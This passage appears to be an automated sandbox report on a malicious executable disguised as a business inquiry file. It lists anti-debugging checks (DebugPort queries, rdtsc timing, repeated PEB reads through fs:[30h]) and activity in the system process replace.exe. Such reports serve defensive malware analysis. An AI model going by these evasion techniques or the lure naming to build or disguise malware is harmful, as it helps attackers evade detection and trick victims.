                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F1096E rdtsc 4_2_00F1096E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00417673 LdrLoadDll,4_2_00417673
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F120F0 mov ecx, dword ptr fs:[00000030h]4_2_00F120F0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED80E9 mov eax, dword ptr fs:[00000030h]4_2_00ED80E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECA0E3 mov ecx, dword ptr fs:[00000030h]4_2_00ECA0E3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F560E0 mov eax, dword ptr fs:[00000030h]4_2_00F560E0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECC0F0 mov eax, dword ptr fs:[00000030h]4_2_00ECC0F0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F520DE mov eax, dword ptr fs:[00000030h]4_2_00F520DE
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F960B8 mov eax, dword ptr fs:[00000030h]4_2_00F960B8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F960B8 mov ecx, dword ptr fs:[00000030h]4_2_00F960B8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F680A8 mov eax, dword ptr fs:[00000030h]4_2_00F680A8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED208A mov eax, dword ptr fs:[00000030h]4_2_00ED208A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFC073 mov eax, dword ptr fs:[00000030h]4_2_00EFC073
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F56050 mov eax, dword ptr fs:[00000030h]4_2_00F56050
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED2050 mov eax, dword ptr fs:[00000030h]4_2_00ED2050
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F66030 mov eax, dword ptr fs:[00000030h]4_2_00F66030
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECA020 mov eax, dword ptr fs:[00000030h]4_2_00ECA020
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECC020 mov eax, dword ptr fs:[00000030h]4_2_00ECC020
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F54000 mov ecx, dword ptr fs:[00000030h]4_2_00F54000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F72000 mov eax, dword ptr fs:[00000030h]4_2_00F72000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F72000 mov eax, dword ptr fs:[00000030h]4_2_00F72000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F72000 mov eax, dword ptr fs:[00000030h]4_2_00F72000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F72000 mov eax, dword ptr fs:[00000030h]4_2_00F72000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F72000 mov eax, dword ptr fs:[00000030h]4_2_00F72000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F72000 mov eax, dword ptr fs:[00000030h]4_2_00F72000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F72000 mov eax, dword ptr fs:[00000030h]4_2_00F72000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F72000 mov eax, dword ptr fs:[00000030h]4_2_00F72000
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE016 mov eax, dword ptr fs:[00000030h]4_2_00EEE016
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE016 mov eax, dword ptr fs:[00000030h]4_2_00EEE016
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE016 mov eax, dword ptr fs:[00000030h]4_2_00EEE016
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE016 mov eax, dword ptr fs:[00000030h]4_2_00EEE016
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F001F8 mov eax, dword ptr fs:[00000030h]4_2_00F001F8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA61E5 mov eax, dword ptr fs:[00000030h]4_2_00FA61E5
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E1D0 mov eax, dword ptr fs:[00000030h]4_2_00F4E1D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E1D0 mov eax, dword ptr fs:[00000030h]4_2_00F4E1D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E1D0 mov ecx, dword ptr fs:[00000030h]4_2_00F4E1D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E1D0 mov eax, dword ptr fs:[00000030h]4_2_00F4E1D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E1D0 mov eax, dword ptr fs:[00000030h]4_2_00F4E1D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F961C3 mov eax, dword ptr fs:[00000030h]4_2_00F961C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F961C3 mov eax, dword ptr fs:[00000030h]4_2_00F961C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5019F mov eax, dword ptr fs:[00000030h]4_2_00F5019F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5019F mov eax, dword ptr fs:[00000030h]4_2_00F5019F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5019F mov eax, dword ptr fs:[00000030h]4_2_00F5019F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5019F mov eax, dword ptr fs:[00000030h]4_2_00F5019F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8C188 mov eax, dword ptr fs:[00000030h]4_2_00F8C188
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8C188 mov eax, dword ptr fs:[00000030h]4_2_00F8C188
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F10185 mov eax, dword ptr fs:[00000030h]4_2_00F10185
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F74180 mov eax, dword ptr fs:[00000030h]4_2_00F74180
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F74180 mov eax, dword ptr fs:[00000030h]4_2_00F74180
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECA197 mov eax, dword ptr fs:[00000030h]4_2_00ECA197
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECA197 mov eax, dword ptr fs:[00000030h]4_2_00ECA197
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECA197 mov eax, dword ptr fs:[00000030h]4_2_00ECA197
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F68158 mov eax, dword ptr fs:[00000030h]4_2_00F68158
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F64144 mov eax, dword ptr fs:[00000030h]4_2_00F64144
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F64144 mov eax, dword ptr fs:[00000030h]4_2_00F64144
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F64144 mov ecx, dword ptr fs:[00000030h]4_2_00F64144
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F64144 mov eax, dword ptr fs:[00000030h]4_2_00F64144
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F64144 mov eax, dword ptr fs:[00000030h]4_2_00F64144
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6154 mov eax, dword ptr fs:[00000030h]4_2_00ED6154
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6154 mov eax, dword ptr fs:[00000030h]4_2_00ED6154
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECC156 mov eax, dword ptr fs:[00000030h]4_2_00ECC156
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F00124 mov eax, dword ptr fs:[00000030h]4_2_00F00124
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F90115 mov eax, dword ptr fs:[00000030h]4_2_00F90115
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7A118 mov ecx, dword ptr fs:[00000030h]4_2_00F7A118
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7A118 mov eax, dword ptr fs:[00000030h]4_2_00F7A118
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7A118 mov eax, dword ptr fs:[00000030h]4_2_00F7A118
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7A118 mov eax, dword ptr fs:[00000030h]4_2_00F7A118
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov eax, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov ecx, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov eax, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov eax, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov ecx, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov eax, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov eax, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov ecx, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov eax, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E10E mov ecx, dword ptr fs:[00000030h]4_2_00F7E10E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE02E1 mov eax, dword ptr fs:[00000030h]4_2_00EE02E1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE02E1 mov eax, dword ptr fs:[00000030h]4_2_00EE02E1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE02E1 mov eax, dword ptr fs:[00000030h]4_2_00EE02E1
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA2C3 mov eax, dword ptr fs:[00000030h]4_2_00EDA2C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA2C3 mov eax, dword ptr fs:[00000030h]4_2_00EDA2C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA2C3 mov eax, dword ptr fs:[00000030h]4_2_00EDA2C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA2C3 mov eax, dword ptr fs:[00000030h]4_2_00EDA2C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA2C3 mov eax, dword ptr fs:[00000030h]4_2_00EDA2C3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE02A0 mov eax, dword ptr fs:[00000030h]4_2_00EE02A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE02A0 mov eax, dword ptr fs:[00000030h]4_2_00EE02A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F662A0 mov eax, dword ptr fs:[00000030h]4_2_00F662A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F662A0 mov ecx, dword ptr fs:[00000030h]4_2_00F662A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F662A0 mov eax, dword ptr fs:[00000030h]4_2_00F662A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F662A0 mov eax, dword ptr fs:[00000030h]4_2_00F662A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F662A0 mov eax, dword ptr fs:[00000030h]4_2_00F662A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F662A0 mov eax, dword ptr fs:[00000030h]4_2_00F662A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E284 mov eax, dword ptr fs:[00000030h]4_2_00F0E284
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0E284 mov eax, dword ptr fs:[00000030h]4_2_00F0E284
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F50283 mov eax, dword ptr fs:[00000030h]4_2_00F50283
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F50283 mov eax, dword ptr fs:[00000030h]4_2_00F50283
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F50283 mov eax, dword ptr fs:[00000030h]4_2_00F50283
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC826B mov eax, dword ptr fs:[00000030h]4_2_00EC826B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80274 mov eax, dword ptr fs:[00000030h]4_2_00F80274
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED4260 mov eax, dword ptr fs:[00000030h]4_2_00ED4260
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED4260 mov eax, dword ptr fs:[00000030h]4_2_00ED4260
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED4260 mov eax, dword ptr fs:[00000030h]4_2_00ED4260
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8A250 mov eax, dword ptr fs:[00000030h]4_2_00F8A250
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8A250 mov eax, dword ptr fs:[00000030h]4_2_00F8A250
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6259 mov eax, dword ptr fs:[00000030h]4_2_00ED6259
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F58243 mov eax, dword ptr fs:[00000030h]4_2_00F58243
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F58243 mov ecx, dword ptr fs:[00000030h]4_2_00F58243
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECA250 mov eax, dword ptr fs:[00000030h]4_2_00ECA250
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC823B mov eax, dword ptr fs:[00000030h]4_2_00EC823B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE03E9 mov eax, dword ptr fs:[00000030h]4_2_00EE03E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE03E9 mov eax, dword ptr fs:[00000030h]4_2_00EE03E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE03E9 mov eax, dword ptr fs:[00000030h]4_2_00EE03E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE03E9 mov eax, dword ptr fs:[00000030h]4_2_00EE03E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE03E9 mov eax, dword ptr fs:[00000030h]4_2_00EE03E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE03E9 mov eax, dword ptr fs:[00000030h]4_2_00EE03E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE03E9 mov eax, dword ptr fs:[00000030h]4_2_00EE03E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE03E9 mov eax, dword ptr fs:[00000030h]4_2_00EE03E9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F063FF mov eax, dword ptr fs:[00000030h]4_2_00F063FF
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE3F0 mov eax, dword ptr fs:[00000030h]4_2_00EEE3F0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE3F0 mov eax, dword ptr fs:[00000030h]4_2_00EEE3F0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EEE3F0 mov eax, dword ptr fs:[00000030h]4_2_00EEE3F0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F743D4 mov eax, dword ptr fs:[00000030h]4_2_00F743D4
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F743D4 mov eax, dword ptr fs:[00000030h]4_2_00F743D4
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E3DB mov eax, dword ptr fs:[00000030h]4_2_00F7E3DB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E3DB mov eax, dword ptr fs:[00000030h]4_2_00F7E3DB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E3DB mov ecx, dword ptr fs:[00000030h]4_2_00F7E3DB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7E3DB mov eax, dword ptr fs:[00000030h]4_2_00F7E3DB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA3C0 mov eax, dword ptr fs:[00000030h]4_2_00EDA3C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA3C0 mov eax, dword ptr fs:[00000030h]4_2_00EDA3C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA3C0 mov eax, dword ptr fs:[00000030h]4_2_00EDA3C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA3C0 mov eax, dword ptr fs:[00000030h]4_2_00EDA3C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA3C0 mov eax, dword ptr fs:[00000030h]4_2_00EDA3C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA3C0 mov eax, dword ptr fs:[00000030h]4_2_00EDA3C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED83C0 mov eax, dword ptr fs:[00000030h]4_2_00ED83C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED83C0 mov eax, dword ptr fs:[00000030h]4_2_00ED83C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED83C0 mov eax, dword ptr fs:[00000030h]4_2_00ED83C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED83C0 mov eax, dword ptr fs:[00000030h]4_2_00ED83C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F8C3CD mov eax, dword ptr fs:[00000030h]4_2_00F8C3CD
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F563C0 mov eax, dword ptr fs:[00000030h]4_2_00F563C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF438F mov eax, dword ptr fs:[00000030h]4_2_00EF438F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF438F mov eax, dword ptr fs:[00000030h]4_2_00EF438F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECE388 mov eax, dword ptr fs:[00000030h]4_2_00ECE388
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECE388 mov eax, dword ptr fs:[00000030h]4_2_00ECE388
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECE388 mov eax, dword ptr fs:[00000030h]4_2_00ECE388
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC8397 mov eax, dword ptr fs:[00000030h]4_2_00EC8397
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC8397 mov eax, dword ptr fs:[00000030h]4_2_00EC8397
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC8397 mov eax, dword ptr fs:[00000030h]4_2_00EC8397
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7437C mov eax, dword ptr fs:[00000030h]4_2_00F7437C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F78350 mov ecx, dword ptr fs:[00000030h]4_2_00F78350
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5035C mov eax, dword ptr fs:[00000030h]4_2_00F5035C
